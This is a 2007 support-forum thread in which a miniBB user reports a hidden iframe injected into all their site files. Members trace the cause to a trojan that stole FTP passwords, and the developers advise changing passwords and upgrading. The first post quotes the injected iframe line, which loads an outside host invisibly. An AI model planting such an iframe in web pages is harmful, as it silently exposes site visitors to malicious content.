miniBB ® miniBB®
miniBB Support Forums
 | Forums | Register | Search | Statistics | Manual |
Bugs miniBB Support Forums / Bugs /   

unknown exploite

Author 2ramil
Registered
#1 | Posted: 9 May 2007 12:21 
something bad happened. to all files with .php and .html extensions
<!-- ~ --><iframe src="http://hostbiz.info/contact.html" width=1 height=1 frameborder=0></iframe><!-- ~ -->
code were wroten. this happened on two my sites, which have a minibb 2.0.3 and on the forum.alfaspace.net which has 2RC4 version, so i and alfaspace.net forum community think that the problem is in minibb... but we even don't know what happened, what used, etc. pleace, help us! if everyone could write anything to our files, it's enormously bad

Author tom322
Registered
#2 | Posted: 9 May 2007 15:56 | Edited by: tom322 
I went to both sites and couldn't find any problem; I guess a more detailed description could help.

Another reason could be your own custom modifications that weren't safe enough to pass the exploit test...

Author nixfloyd
Guest
#3 | Posted: 10 May 2007 19:33 
Check your pc for trojans/viruses and never save the ftp passwords for your hosting accounts in ftp clients, as many of them save passwords in plain text or other easy accesible way.
This could be one of the causes, and has been reported at many hosting companies, also, ask alphaspace to check ftp logs for activity on your account, i'm sure they will find that "you hav e modified the files by ftp", and they'll be right

nixfloyd__at__gmail__com

Author Paul
Lead Developer
#4 | Posted: 11 May 2007 02:04 | Edited by: Paul 
I too heard previously about this exploit and so far I could tell it's not related to miniBB. Most probably it is from Psyme series.

I'd recommend to change all FTP passwords and upgrade to the latest release (RC4 is too old...)

Author 2ramil
Registered
#5 | Posted: 11 May 2007 13:05 
nixfloyd
Paul
sorry, now i'm really know the reason of this... now i'll change my passes and make backups more frequently:)

Author tom322
Registered
#6 | Posted: 11 May 2007 15:40 
2ramil
Could you share the reason? :)

Author 2ramil
Registered
#7 | Posted: 13 May 2007 02:10 
tom322
a trojan :( who stole passes from total commander, etc. then send them to their site and script connects to ftp and write this code to all .html and index.php files

Author tom322
Registered
#8 | Posted: 13 May 2007 06:43 
OK, thanks 2ramil. At least we know miniBB script wasn't the reason. I notice more and more trojans or hack attempts these days ... :(

Bugs miniBB Support Forums / Bugs / unknown exploite Top
This topic is closed. New replies are not allowed.
 
miniBB Support Forums Powered by Forum Software miniBB ® Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contacts
Install the Captcha add-on: protect your miniBB-forums from the automated spam and flood.
Captcha Addon for miniBB